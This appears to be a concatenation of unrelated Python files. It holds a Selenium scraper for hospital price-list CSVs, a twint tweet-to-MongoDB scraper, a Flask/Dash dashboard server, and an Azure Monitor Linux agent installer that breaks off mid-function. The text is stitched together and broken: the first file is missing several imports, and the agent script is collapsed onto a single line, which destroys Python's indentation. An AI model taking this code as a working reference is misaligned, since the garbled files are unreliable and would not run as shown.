from socketserver import TCPServer
import webbrowser
from time import sleep
import json
import shutil
import re
import sys
import os


class BrowserServer(SimpleHTTPRequestHandler):
    '''here we subclass SimpleHTTPServer to capture error messages
    '''

    def log_message(self, format, *args):
        '''log to standard error with a date time string,
           and then call any subclass specific logging functions
        '''
        sys.stderr.write("%s - - [%s] %s\n" %
                         (self.address_string(),
                          self.log_date_time_string(),
                          format % args))

        # Workaround for error trying to GET html
        if not re.search("div", format % args) and not re.search("function", format % args):
            if re.search("404", format % args):
                raise IOError(format % args)

    def log_error(self, format, *args):
        '''log_error catch errors in the log_messages instead
        '''
        pass


class BrowserRobot(object):
    '''bring up a server with a custom robot

       Defaults
       ==========
       pause_time: time to wait between browser commands
       port: a random choice between 8000 and 9999
    '''

    def __init__(self, **kwargs):
        self.Handler = BrowserServer
        # Honour a caller-provided port, otherwise pick a random one.
        if "port" in kwargs:
            self.port = kwargs['port']
        else:
            self.port = choice(range(8000, 9999))
        print('Selected port is %s' % self.port)
        self.httpd = TCPServer(("", self.port), self.Handler)
        self.server = Thread(target=self.httpd.serve_forever)
        # daemon = True replaces the deprecated setDaemon() call.
        self.server.daemon = True
        self.server.start()
        self.started = True
        self.pause_time = 100
        self.browser = None
        self.headless = False
        self.display = None
        self.driver = "Chrome"
        if "browser" in kwargs:
            self.driver = kwargs['browser']

    def get_and_wait(self, url, sleep_seconds=0):
        '''a helper function to get a browser and wait
           a randomly selected number of seconds between 0 and 2'''
        self.get_browser()
        wait_time = choice([0, 0.25, 0.5, 0.75, 1, 1.5, 2])
        self.browser.implicitly_wait(wait_time)  # if error, will wait 3 seconds and retry
        self.browser.set_page_load_timeout(10)
        self.get_page(url)
        sleep(sleep_seconds)

    def get_browser(self, name=None):
        '''get_browser
           return a browser if it hasn't been initialized yet
        '''
        if name is None:
            name = self.driver
        log_path = "%s-driver.log" % name.lower()
        if self.browser is None:
            options = self.get_options()
            # Bug fix: the original compared name.lower() == "Firefox",
            # which can never be true, so Firefox was never selected.
            if name.lower() == "firefox":
                self.browser = webdriver.Firefox(service_log_path=log_path)
            else:
                self.browser = webdriver.Chrome(service_log_path=log_path,
                                                options=options)
        return self.browser

    def get_options(self, width=1200, height=800):
        '''return options for headless, no-sandbox, and custom width/height
        '''
        options = webdriver.ChromeOptions()
        options.add_argument("headless")
        options.add_argument("no-sandbox")
        options.add_argument("window-size=%sx%s" % (width, height))
        return options

    def get_page(self, url, name='Chrome'):
        '''get_page open a particular url, checking for Timeout
        '''
        if self.browser is None:
            self.browser = self.get_browser(name)
        try:
            return self.browser.get(url)
        except TimeoutException:
            print('Browser request timeout. Are you connected to the internet?')
            self.browser.close()
            sys.exit(1)

    def stop(self):
        '''close any running browser or server, and shut down the robot
        '''
        if self.browser is not None:
            self.browser.close()
        self.httpd.server_close()

        if self.display is not None:
            self.display.close()

    def run_javascript(self, code):
        '''execute javascript in the running browser, if there is one.

           Bug fix: the original signature ``run_javascript(browser, code)``
           omitted ``self`` while the body referenced ``self.browser``, so
           any call raised NameError. As an instance method the first
           positional argument is the robot itself, so this signature is
           what callers were effectively invoking.
        '''
        if self.browser is not None:
            return self.browser.execute_script(code)


class ScraperRobot(BrowserRobot):

    def __str__(self):
        return "[browser-robot]"

    def __repr__(self):
        return "[browser-robot]"

    def get_download_urls(self, url):
        '''download paginated charge sheets

           Parameters
           ==========
           uri: the Docker Hub uri to parse.
        '''
        self.get_and_wait(url)
        prefix = "https://core.secure.ehc.com/src/util/detail-price-list"
        javascript = 'return document.getElementsByTagName("option")'
        result = self.browser.execute_script(javascript)

        links = set()
        for option in result:
            value = option.get_attribute('value')
            # ``is not None`` instead of ``!= None`` for the None check.
            if value is not None:
                if "csv" in value:
                    csvs = value.split('|')
                    for csv in csvs:
                        link = prefix + '/' + csv
                        links.add(link)
        return list(links)
scraper.py
import subprocess
import os
import glob
from multiprocessing import Process
import logging
import time
from datetime import datetime

import twint as tw

print('Initialising twint config')

# Twitter handles of the news outlets to scrape.
NEWSOUTLETS = ['nytimes', 'CNN', 'BBC', 'MSNBC', 'NPR', 'FoxNews', 'WSJ']
DPATH = os.getcwd() + '/data'  # Equates to ./data


def check_dir_exists(name):
    """Create the ./data/<name> directory if it does not already exist."""
    try:
        os.makedirs(os.path.join(DPATH, name))
        print(f'> Created directory in /data for {name}')
    except FileExistsError:
        pass  # Folder already exists


def get_last_scraped(username):
    """Return the datetime string encoded in the newest CSV filename under
    ./data/<username>, or None when no previous scrape exists.

    Filenames are expected to look like '%Y%m%d-%H%M%S.csv' (written by
    scrape_tweets below).
    """
    list_of_files = glob.iglob(f'{os.path.join(DPATH, username)}/*.csv')
    try:
        latest_scraped = max(list_of_files, key=os.path.getctime)
    except ValueError:
        # max() raises ValueError on an empty iterator: nothing scraped yet.
        return None
    # os.path.basename is portable; the previous rsplit('\\', 1)[1] raised an
    # uncaught IndexError on any OS whose path separator is '/'.
    filename = os.path.basename(latest_scraped)
    dstring = filename.split('.', 1)[0]  # Strip the .csv extension
    last_date_time = datetime.strptime(dstring, '%Y%m%d-%H%M%S')
    return str(last_date_time)


def scrape_tweets(tc, username):
    """Search and extract tweets for *username* via twint, then load the
    resulting CSV into the database.

    tc: a twint Config object (mutated in place with output/search options).
    """
    check_dir_exists(username)
    current_time = datetime.now()
    tc.Output = os.path.join(
        DPATH, username, current_time.strftime("%Y%m%d-%H%M%S")) + '.csv'
    tc.Store_csv = True
    # Only scrape tweets newer than the last run, when one exists.
    # (Single lookup; the original called get_last_scraped twice.)
    last_scraped = get_last_scraped(username)
    if last_scraped is not None:
        tc.Since = last_scraped
    tc.Username = username
    print(f'> Searching tweets by the user {username}')
    tw.run.Search(tc)
    print(f'> Search under {username} complete. Adding data to database')
    insert_data(tc.Output)


def insert_data(filename):
    """Import tweet objects into MongoDB with the mongoimport tool."""
    # shell=False with an argument list avoids shell quoting issues; on POSIX
    # the old shell=True + list form silently dropped every argument after
    # the executable name.
    subprocess.run(['mongoimport.exe', '-dtest', '-ctest',
                    '--headerline', '--type=csv', filename])


if __name__ == '__main__':
    # One process per news outlet, each running scrape_tweets(config, handle).
    processes = []
    for outlet in NEWSOUTLETS:
        p = Process(target=scrape_tweets, args=(tw.Config(), outlet))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
dashboard.py
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license

from IPython import display
import re
import requests
import threading
import os
from . import udash
from gevent.pywsgi import WSGIServer
from flask import Flask
import socket
import random
from string import Template

import logging

log = logging.getLogger(__name__)

app = Flask(__name__)
app.logger.disabled = True


def _build_path(path, base_url=None):
    """Return *path*, prefixed with *base_url* when one is configured."""
    if base_url:
        return "{0}/{1}".format(base_url, path)
    return path


class AppRunner:
    """Hosts the dispatcher WSGI app on a background daemon thread."""

    def __init__(self, addr=None, base_url=None, use_relative_links=False):
        self.app = DispatcherApp(
            base_url=base_url, use_relative_links=use_relative_links
        )
        self.base_url = base_url
        self.use_relative_links = use_relative_links
        self._thread = None

        if addr is not None:
            # Caller supplied an explicit (ip, port) pair.
            self.ip = addr[0]
            self.port = addr[1]
            return

        # No address supplied: probe random local ports until one is free.
        self.ip = "127.0.0.1"
        self.port = -1
        max_attempts = 10
        for _ in range(max_attempts):
            candidate = random.randint(7000, 7999)
            if self._local_port_available(candidate, rais=False):
                self.port = candidate
                log.info("Found open port: {0}".format(candidate))
                break
            else:  # pragma: no cover
                log.info("Port already in use: {0}".format(candidate))
        else:  # pragma: no cover
            msg = """Could not find open port.
Consider calling `interpret.set_show_addr(("127.0.0.1", 7001))` first.
"""
            log.error(msg)
            raise RuntimeError(msg)

    def _local_port_available(self, port, rais=True):
        """ Borrowed from:
        https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
        """
        try:
            backlog = 5
            # Probe IPv4 first, then IPv6, exactly as the bind would at serve time.
            for family, host in ((socket.AF_INET, "127.0.0.1"),
                                 (socket.AF_INET6, "::1")):
                probe = socket.socket(family, socket.SOCK_STREAM)
                probe.bind((host, port))
                probe.listen(backlog)
                probe.close()
        except socket.error:  # pragma: no cover
            if rais:
                raise RuntimeError(
                    "The server is already running on port {0}".format(port)
                )
            else:
                return False
        return True

    def stop(self):
        """Request server shutdown over HTTP and join the thread.

        Returns True when the runner is (now) stopped, False on failure.
        """
        if self._thread is None:
            # Nothing running; treat as already stopped.
            return True

        log.info("Triggering shutdown")
        try:
            path = _build_path("shutdown")
            url = "http://{0}:{1}/{2}".format(self.ip, self.port, path)
            r = requests.post(url)
            log.debug(r)
        except requests.exceptions.RequestException as e:  # pragma: no cover
            log.info("Dashboard stop failed: {0}".format(e))
            return False

        if self._thread is not None:
            self._thread.join(timeout=5.0)
            if self._thread.is_alive():
                log.error("Thread still alive despite shutdown called.")
                return False

        self._thread = None
        return True

    def _run(self):
        """Thread target: serve the dispatcher app until stopped."""
        try:
            class devnull:
                # Discard WSGI access-log writes.
                write = lambda _: None  # noqa: E731

            server = WSGIServer((self.ip, self.port), self.app, log=devnull)
            # Expose the server to the app so /shutdown can stop it.
            self.app.config["server"] = server
            server.serve_forever()
        except Exception as e:  # pragma: no cover
            log.error(e, exc_info=True)

    def _obj_id(self, obj):
        """Key an object by its id() for URL routing."""
        return str(id(obj))

    def start(self):
        """Launch the server on a daemon thread."""
        log.info("Running app runner on: {0}:{1}".format(self.ip, self.port))
        self._thread = threading.Thread(target=self._run, daemon=True)
        self._thread.start()

    def ping(self):
        """ Returns true if web service reachable, otherwise False."""
        try:
            path = _build_path("")
            url = "http://{0}:{1}/{2}".format(self.ip, self.port, path)
            requests.get(url)
            log.info("Dashboard ping succeeded")
            return True
        except requests.exceptions.RequestException as e:  # pragma: no cover
            log.info("Dashboard ping failed: {0}".format(e))
            return False

    def status(self):
        """Return a dict summarizing runner configuration and liveness."""
        thread_alive = self._thread.is_alive() if self._thread else False
        return {
            "addr": (self.ip, self.port),
            "base_url": self.base_url,
            "use_relative_links": self.use_relative_links,
            "thread_alive": thread_alive,
            "http_reachable": self.ping(),
        }

    def register(self, ctx, **kwargs):
        # The path to this instance should be id based.
        self.app.register(ctx, **kwargs)

    def display_link(self, ctx):
        """Build the URL at which *ctx*'s dashboard is served."""
        obj_path = self._obj_id(ctx) + "/"
        if self.base_url is None:
            path = obj_path
        else:
            path = "{0}/{1}".format(self.base_url, obj_path)

        if self.use_relative_links:
            start_url = "/"
        else:
            start_url = "http://{0}:{1}/".format(self.ip, self.port)

        url = "{0}{1}".format(start_url, path)
        log.info("Display URL: {0}".format(url))
        return url

    def display(self, ctx, width="100%", height=800, open_link=False):
        """Render *ctx*'s dashboard inline in the notebook via an iframe."""
        url = self.display_link(ctx)

        html_str = "<!-- {0} -->\n".format(url)
        if open_link:
            html_str += r'<a href="{url}" target="_new">Open in new window</a>'.format(
                url=url
            )
        html_str += """<iframe src="{url}" width={width} height={height} frameBorder="0"></iframe>""".format(
            url=url, width=width, height=height
        )
        display.display_html(html_str, raw=True)
        return None


class DispatcherApp:
    """WSGI app that routes requests to per-context dashboard sub-apps."""

    def __init__(self, base_url=None, use_relative_links=False):
        self.base_url = base_url
        self.use_relative_links = use_relative_links
        self.root_path = "/"
        self.shutdown_path = "/shutdown"
        self.favicon_path = "/favicon.ico"
        self.favicon_res = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), "assets", "favicon.ico"
        )
        self.default_app = Flask(__name__)
        self.pool = {}
        self.config = {}

        # First path segment (optionally after base_url) selects the sub-app.
        if self.base_url is None:
            self.app_pattern = re.compile(r"/?(.+?)(/|$)")
        else:
            self.app_pattern = re.compile(
                r"/?(?:{0}/)?(.+?)(/|$)".format(self.base_url)
            )

    def obj_id(self, obj):
        """Key an object by its id() for URL routing."""
        return str(id(obj))

    def register(self, ctx, share_tables=None):
        """Create (once) a dashboard sub-app for *ctx* and pool its server."""
        ctx_id = self.obj_id(ctx)
        if ctx_id in self.pool:
            log.debug("App Entry found: {0}".format(ctx_id))
            return

        log.info("Creating App Entry: {0}".format(ctx_id))
        if self.base_url is None:
            ctx_path = "/{0}/".format(ctx_id)
        else:
            ctx_path = "/{0}/{1}/".format(self.base_url, ctx_id)
        dash_app = udash.generate_app(
            ctx,
            {"share_tables": share_tables},
            # url_base_pathname=ctx_path,
            requests_pathname_prefix=ctx_path,
            routes_pathname_prefix=ctx_path,
        )
        dash_app.css.config.serve_locally = True
        dash_app.scripts.config.serve_locally = True
        self.pool[ctx_id] = dash_app.server

    def __call__(self, environ, start_response):
        path_info = environ.get("PATH_INFO", "")
        script_name = environ.get("SCRIPT_NAME", "")
        log.debug("PATH INFO : {0}".format(path_info))
        log.debug("SCRIPT NAME: {0}".format(script_name))
        try:
            if path_info == self.root_path:
                log.info("Root path requested.")
                start_response("200 OK", [("content-type", "text/html")])
                content = self._root_content()
                return [content.encode("utf-8")]

            if path_info == self.shutdown_path:
                log.info("Shutting down.")
                server = self.config["server"]
                server.stop()
                start_response("200 OK", [("content-type", "text/html")])
                return ["Shutdown".encode("utf-8")]

            if path_info == self.favicon_path:
                log.info("Favicon requested.")
                start_response("200 OK", [("content-type", "image/x-icon")])
                with open(self.favicon_res, "rb") as handler:
                    return [handler.read()]

            match = re.search(self.app_pattern, path_info)
            if match is None or self.pool.get(match.group(1), None) is None:
                msg = "URL not supported: {0}".format(path_info)
                log.error(msg)
                start_response(
                    "400 BAD REQUEST ERROR", [("content-type", "text/html")]
                )
                return [msg.encode("utf-8")]

            ctx_id = match.group(1)
            log.info("Routing request: {0}".format(ctx_id))
            sub_app = self.pool[ctx_id]
            if self.base_url and not environ["PATH_INFO"].startswith(
                "/{0}".format(self.base_url)
            ):
                log.info("No base url in path. Rewrite to include in path.")
                environ["PATH_INFO"] = "/{0}{1}".format(
                    self.base_url, environ["PATH_INFO"]
                )
            return sub_app(environ, start_response)
        except Exception as e:  # pragma: no cover
            log.error(e, exc_info=True)
            try:
                start_response(
                    "500 INTERNAL SERVER ERROR", [("Content-Type", "text/plain")]
                )
            except Exception:
                pass
            return [
                "Internal Server Error caught by Dispatcher. See logs if available.".encode(
                    "utf-8"
                )
            ]

    def _root_content(self):
        """Render the landing page listing all registered sub-app links."""
        body = r"""<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Backend Server</title>
</head>
<style>
body {
    background-color: white;
    margin: 0;
    padding: 0;
    min-height: 100vh;
}
.banner {
    height: 65px;
    margin: 0;
    padding: 0;
    background-color: rgb(20, 100, 130);
    box-shadow: rgba(0, 0, 0, 0.1) 1px 2px 3px 0px;
}
.banner h2{
    color: white;
    margin-top: 0px;
    padding: 15px 0;
    text-align: center;
    font-family: Georgia, Times New Roman, Times, serif;
}
.app {
    background-color: rgb(245, 245, 250);
    min-height: 100vh;
    overflow: hidden;
}
.card-header{
    padding-top: 12px;
    padding-bottom: 12px;
    padding-left: 20px;
    padding-right: 20px;
    position: relative;
    line-height: 1;
    border-bottom: 1px solid #eaeff2;
    background-color: rgba(20, 100, 130, 0.78);
}
.card-body{
    padding-top: 30px;
    padding-bottom: 30px;
    position: relative;
    padding-left: 20px;
    padding-right: 20px;
}
.card-title{
    display: inline-block;
    margin: 0;
    color: #ffffff;
}
.card {
    border-radius: 3px;
    background-color: white;
    box-shadow: 0 2px 6px rgba(0, 0, 0, 0.08);
    border: 1px solid #d1d6e6;
    margin: 30px 20px;
}
.link-container {
    text-align: center;
}
.link-container ul {
    display: inline-block;
    margin: 0px;
    padding: 0px;
}
.link-container li {
    display: block;
    padding: 15px;
}
.center {
    position: absolute;
    left: 50%;
    top: 50%;
    -webkit-transform: translate(-50%, -50%);
    transform: translate(-50%, -50%);
}
</style>
<body>
    <div class="app">
        <div class="banner"><h2>Backend Server</h2></div>
        <div class="card">
            <div class="card-header">
                <div class="card-title"><div class="center">Active Links</div></div>
            </div>
            <div class="card-body">
                <div class="link-container">
                    <ul>
                        $list
                    </ul>
                </div>
            </div>
        </div>
    </div>
</body>
</html>
"""
        if not self.pool:
            items = "<li>No active links.</li>"
        else:
            items = "\n".join(
                [
                    r'<li><a href="{0}">{1}</a></li>'.format(
                        "/{0}/".format(key)
                        if self.base_url is None
                        else "/{0}/{1}/".format(self.base_url, key),
                        key,
                    )
                    for key in self.pool.keys()
                ]
            )
        content = Template(body).substitute(list=items)
        return content
agent.py
#!/usr/bin/env python # # AzureMonitoringLinuxAgent Extension # # Copyright 2019 Microsoft Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import os.path import datetime import signal import pwd import grp import re import filecmp import stat import sys import traceback import time import platform import subprocess import json import base64 import inspect import urllib import urllib2 import shutil import crypt import xml.dom.minidom import re import hashlib from distutils.version import LooseVersion from hashlib import sha256 from shutil import copyfile from threading import Thread import telegraf_utils.telegraf_config_handler as telhandler import metrics_ext_utils.metrics_constants as metrics_constants import metrics_ext_utils.metrics_ext_handler as me_handler try: from Utils.WAAgentUtil import waagent import Utils.HandlerUtil as HUtil except Exception as e: # These utils have checks around the use of them; this is not an exit case print('Importing utils failed with error: {0}'.format(e)) # Global Variables PackagesDirectory = 'packages' # TO BE CHANGED WITH EACH NEW RELEASE IF THE BUNDLE VERSION CHANGES # TODO: Installer should automatically figure this out from the folder instead of requiring this update BundleFileNameDeb = 'azure-mdsd_1.5.124-build.master.89_x86_64.deb' BundleFileNameRpm = 'azure-mdsd_1.5.124-build.master.89_x86_64.rpm' BundleFileName = '' TelegrafBinName = 'telegraf' InitialRetrySleepSeconds = 30 PackageManager = '' MdsdCounterJsonPath = 
'/etc/mdsd.d/config-cache/metricCounters.json' # Commands OneAgentInstallCommand = '' OneAgentUninstallCommand = '' RestartOneAgentServiceCommand = '' DisableOneAgentServiceCommand = '' # Error codes DPKGLockedErrorCode = 56 MissingorInvalidParameterErrorCode = 53 UnsupportedOperatingSystem = 51 # Configuration HUtilObject = None SettingsSequenceNumber = None HandlerEnvironment = None SettingsDict = None # Change permission of log path - if we fail, that is not an exit case try: ext_log_path = '/var/log/azure/' if os.path.exists(ext_log_path): os.chmod(ext_log_path, 700) except: pass def main(): """ Main method Parse out operation from argument, invoke the operation, and finish. """ init_waagent_logger() waagent_log_info('Azure Monitoring Agent for Linux started to handle.') # Determine the operation being executed operation = None try: option = sys.argv[1] if re.match('^([-/]*)(disable)', option): operation = 'Disable' elif re.match('^([-/]*)(uninstall)', option): operation = 'Uninstall' elif re.match('^([-/]*)(install)', option): operation = 'Install' elif re.match('^([-/]*)(enable)', option): operation = 'Enable' elif re.match('^([-/]*)(update)', option): operation = 'Update' elif re.match('^([-/]*)(metrics)', option): operation = 'Metrics' except Exception as e: waagent_log_error(str(e)) if operation is None: log_and_exit('Unknown', 1, 'No valid operation provided') # Set up for exit code and any error messages exit_code = 0 message = '{0} succeeded'.format(operation) exit_code = check_disk_space_availability() if exit_code is not 0: message = '{0} failed due to low disk space'.format(operation) log_and_exit(operation, exit_code, message) # Invoke operation try: global HUtilObject HUtilObject = parse_context(operation) exit_code, output = operations[operation]() # Exit code 1 indicates a general problem that doesn't have a more # specific error code; it often indicates a missing dependency if exit_code is 1 and operation == 'Install': message = 'Install failed 
with exit code 1. Please check that ' \ 'dependencies are installed. For details, check logs ' \ 'in /var/log/azure/Microsoft.Azure.Monitor' \ '.AzureMonitorLinuxAgent' elif exit_code is DPKGLockedErrorCode and operation == 'Install': message = 'Install failed with exit code {0} because the ' \ 'package manager on the VM is currently locked: ' \ 'please wait and try again'.format(DPKGLockedErrorCode) elif exit_code is not 0: message = '{0} failed with exit code {1} {2}'.format(operation, exit_code, output) except AzureMonitorAgentForLinuxException as e: exit_code = e.error_code message = e.get_error_message(operation) except Exception as e: exit_code = 1 message = '{0} failed with error: {1}\n' \ 'Stacktrace: {2}'.format(operation, e, traceback.format_exc()) # Finish up and log messages log_and_exit(operation, exit_code, message) def check_disk_space_availability(): """ Check if there is the required space on the machine. """ try: if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 : # 52 is the exit code for missing dependency i.e. disk space # https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr return 52 else: return 0 except: print('Failed to check disk usage.') return 0 def get_free_space_mb(dirname): """ Get the free space in MB in the directory path. """ st = os.statvfs(dirname) return st.f_bavail * st.f_frsize / 1024 / 1024 def is_systemd(): """ Check if the system is using systemd """ check_systemd = os.system("pidof systemd 1>/dev/null 2>&1") return check_systemd == 0 def install(): """ Ensure that this VM distro and version are supported. Install the Azure Monitor Linux Agent package, using retries. Note: install operation times out from WAAgent at 15 minutes, so do not wait longer. 
""" find_package_manager("Install") exit_if_vm_not_supported('Install') public_settings, protected_settings = get_settings() package_directory = os.path.join(os.getcwd(), PackagesDirectory) bundle_path = os.path.join(package_directory, BundleFileName) os.chmod(bundle_path, 100) print (PackageManager, " and ", BundleFileName) OneAgentInstallCommand = "{0} -i {1}".format(PackageManager, bundle_path) hutil_log_info('Running command "{0}"'.format(OneAgentInstallCommand)) # Retry, since install can fail due to concurrent package operations exit_code, output = run_command_with_retries_output(OneAgentInstallCommand, retries = 15, retry_check = retry_if_dpkg_locked, final_check = final_check_if_dpkg_locked) default_configs = { "MCS_ENDPOINT" : "handler.control.monitor.azure.com", "AZURE_ENDPOINT" : "https://monitor.azure.com/", "ADD_REGION_TO_MCS_ENDPOINT" : "true", "ENABLE_MCS" : "false", "MONITORING_USE_GENEVA_CONFIG_SERVICE" : "false", #"OMS_TLD" : "int2.microsoftatlanta-int.com", #"customResourceId" : "/subscriptions/42e7aed6-f510-46a2-8597-a5fe2e15478b/resourcegroups/amcs-test/providers/Microsoft.OperationalInsights/workspaces/amcs-pretend-linuxVM", } # decide the mode if protected_settings is None or len(protected_settings) is 0: default_configs["ENABLE_MCS"] = "true" else: # look for LA protected settings for var in protected_settings.keys(): if "_key" in var or "_id" in var: default_configs[var] = protected_settings.get(var) # check if required GCS params are available MONITORING_GCS_CERT_CERTFILE = None if protected_settings.has_key("certificate"): MONITORING_GCS_CERT_CERTFILE = base64.standard_b64decode(protected_settings.get("certificate")) MONITORING_GCS_CERT_KEYFILE = None if protected_settings.has_key("certificateKey"): MONITORING_GCS_CERT_KEYFILE = base64.standard_b64decode(protected_settings.get("certificateKey")) MONITORING_GCS_ENVIRONMENT = "" if protected_settings.has_key("monitoringGCSEnvironment"): MONITORING_GCS_ENVIRONMENT = 
protected_settings.get("monitoringGCSEnvironment") MONITORING_GCS_NAMESPACE = "" if protected_settings.has_key("namespace"): MONITORING_GCS_NAMESPACE = protected_settings.get("namespace") MONITORING_GCS_ACCOUNT = "" if protected_settings.has_key("monitoringGCSAccount"): MONITORING_GCS_ACCOUNT = protected_settings.get("monitoringGCSAccount") MONITORING_GCS_REGION = "" if protected_settings.has_key("monitoringGCSRegion"): MONITORING_GCS_REGION = protected_settings.get("monitoringGCSRegion") MONITORING_CONFIG_VERSION = "" if protected_settings.has_key("configVersion"): MONITORING_CONFIG_VERSION = protected_settings.get("configVersion") MONITORING_GCS_AUTH_ID_TYPE = "" if protected_settings.has_key("MONITORING_GCS_AUTH_ID_TYPE"): MONITORING_GCS_AUTH_ID_TYPE = protected_settings.get("MONITORING_GCS_AUTH_ID_TYPE") if ((MONITORING_GCS_CERT_CERTFILE is None or MONITORING_GCS_CERT_KEYFILE is None) and (MONITORING_GCS_AUTH_ID_TYPE is "")) or MONITORING_GCS_ENVIRONMENT is "" or MONITORING_GCS_NAMESPACE is "" or MONITORING_GCS_ACCOUNT is "" or MONITORING_GCS_REGION is "" or MONITORING_CONFIG_VERSION is "": waagent_log_error('Not all required GCS parameters are provided') raise ParameterMissingException else: # set the values for GCS default_configs["MONITORING_USE_GENEVA_CONFIG_SERVICE"] = "true" default_configs["MONITORING_GCS_ENVIRONMENT"] = MONITORING_GCS_ENVIRONMENT default_configs["MONITORING_GCS_NAMESPACE"] = MONITORING_GCS_NAMESPACE default_configs["MONITORING_GCS_ACCOUNT"] = MONITORING_GCS_ACCOUNT default_configs["MONITORING_GCS_REGION"] = MONITORING_GCS_REGION default_configs["MONITORING_CONFIG_VERSION"] = MONITORING_CONFIG_VERSION # write the certificate and key to disk uid = pwd.getpwnam("syslog").pw_uid gid = grp.getgrnam("syslog").gr_gid if MONITORING_GCS_AUTH_ID_TYPE is not "": default_configs["MONITORING_GCS_AUTH_ID_TYPE"] = MONITORING_GCS_AUTH_ID_TYPE if MONITORING_GCS_CERT_CERTFILE is not None: default_configs["MONITORING_GCS_CERT_CERTFILE"] = 
"/etc/mdsd.d/gcscert.pem" fh = open("/etc/mdsd.d/gcscert.pem", "wb") fh.write(MONITORING_GCS_CERT_CERTFILE) fh.close() os.chown("/etc/mdsd.d/gcscert.pem", uid, gid) os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcscert.pem", 400)) if MONITORING_GCS_CERT_KEYFILE is not None: default_configs["MONITORING_GCS_CERT_KEYFILE"] = "/etc/mdsd.d/gcskey.pem" fh = open("/etc/mdsd.d/gcskey.pem", "wb") fh.write(MONITORING_GCS_CERT_KEYFILE) fh.close() os.chown("/etc/mdsd.d/gcskey.pem", uid, gid) os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcskey.pem", 400)) config_file = "/etc/default/mdsd" config_updated = False try: if os.path.isfile(config_file): data = [] new_data = "" vars_set = set() with open(config_file, "r") as f: data = f.readlines() for line in data: for var in default_configs.keys(): if var in line: line = "export " + var + "=" + default_configs[var] + "\n" vars_set.add(var) break new_data += line for var in default_configs.keys(): if var not in vars_set: new_data += "export " + var + "=" + default_configs[var] + "\n" with open("/etc/default/mdsd_temp", "w") as f: f.write(new_data) config_updated = True if len(new_data) > 0 else False if not config_updated or not os.path.isfile("/etc/default/mdsd_temp"): log_and_exit("install",MissingorInvalidParameterErrorCode, "Error while updating MCS Environment Variables in /etc/default/mdsd") os.remove(config_file) os.rename("/etc/default/mdsd_temp", config_file) uid = pwd.getpwnam("syslog").pw_uid gid = grp.getgrnam("syslog").gr_gid os.chown(config_file, uid, gid) os.system('chmod {1} {0}'.format(config_file, 400)) else: log_and_exit("install", MissingorInvalidParameterErrorCode, "Could not find the file - /etc/default/mdsd" ) except: log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to add MCS Environment Variables in /etc/default/mdsd" ) return exit_code, output def check_kill_process(pstring): for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"): fields = line.split() pid = fields[0] 
os.kill(int(pid), signal.SIGKILL) def uninstall(): """ Uninstall the Azure Monitor Linux Agent. This is a somewhat soft uninstall. It is not a purge. Note: uninstall operation times out from WAAgent at 5 minutes """ find_package_manager("Uninstall") if PackageManager == "dpkg": OneAgentUninstallCommand = "dpkg -P azure-mdsd" elif PackageManager == "rpm": OneAgentUninstallCommand = "rpm -e azure-mdsd" else: log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" ) hutil_log_info('Running command "{0}"'.format(OneAgentUninstallCommand)) # Retry, since uninstall can fail due to concurrent package operations try: exit_code, output = run_command_with_retries_output(OneAgentUninstallCommand, retries = 4, retry_check = retry_if_dpkg_locked, final_check = final_check_if_dpkg_locked) except Exception as ex: exit_code = 1 output = 'Uninstall failed with error: {0}\n' \ 'Stacktrace: {1}'.format(ex, traceback.format_exc()) return exit_code, output def enable(): """ Start the Azure Monitor Linux Agent Service This call will return non-zero or throw an exception if the settings provided are incomplete or incorrect. Note: enable operation times out from WAAgent at 5 minutes """ exit_if_vm_not_supported('Enable') if is_systemd(): OneAgentEnableCommand = "systemctl start mdsd" else: hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start mdsd.") OneAgentEnableCommand = "/etc/init.d/mdsd start" hutil_log_info('Handler initiating onboarding.') exit_code, output = run_command_and_log(OneAgentEnableCommand) if exit_code is 0: #start metrics process if enable is successful start_metrics_process() return exit_code, output def disable(): """ Disable Azure Monitor Linux Agent process on the VM. 
Note: disable operation times out from WAAgent at 15 minutes """ #stop the metrics process stop_metrics_process() #stop the Azure Monitor Linux Agent service if is_systemd(): DisableOneAgentServiceCommand = "systemctl stop mdsd" else: DisableOneAgentServiceCommand = "/etc/init.d/mdsd stop" hutil_log_info("The VM doesn't have systemctl. Using the init.d service to stop mdsd.") exit_code, output = run_command_and_log(DisableOneAgentServiceCommand) return exit_code, output def update(): """ Update the current installation of AzureMonitorLinuxAgent No logic to install the agent as agent -> install() will be called with udpate because upgradeMode = "UpgradeWithInstall" set in HandlerManifest """ return 0, "" def stop_metrics_process(): if telhandler.is_running(is_lad=False): #Stop the telegraf and ME services tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False) if tel_out: HUtilObject.log(tel_msg) else: HUtilObject.error(tel_msg) #Delete the telegraf and ME services tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service() if tel_rm_out: HUtilObject.log(tel_rm_msg) else: HUtilObject.error(tel_rm_msg) if me_handler.is_running(is_lad=False): me_out, me_msg = me_handler.stop_metrics_service(is_lad=False) if me_out: HUtilObject.log(me_msg) else: HUtilObject.error(me_msg) me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False) if me_rm_out: HUtilObject.log(me_rm_msg) else: HUtilObject.error(me_rm_msg) pids_filepath = os.path.join(os.getcwd(),'amametrics.pid') # kill existing telemetry watcher if os.path.exists(pids_filepath): with open(pids_filepath, "r") as f: for pids in f.readlines(): kill_cmd = "kill " + pids run_command_and_log(kill_cmd) run_command_and_log("rm "+pids_filepath) def start_metrics_process(): """ Start 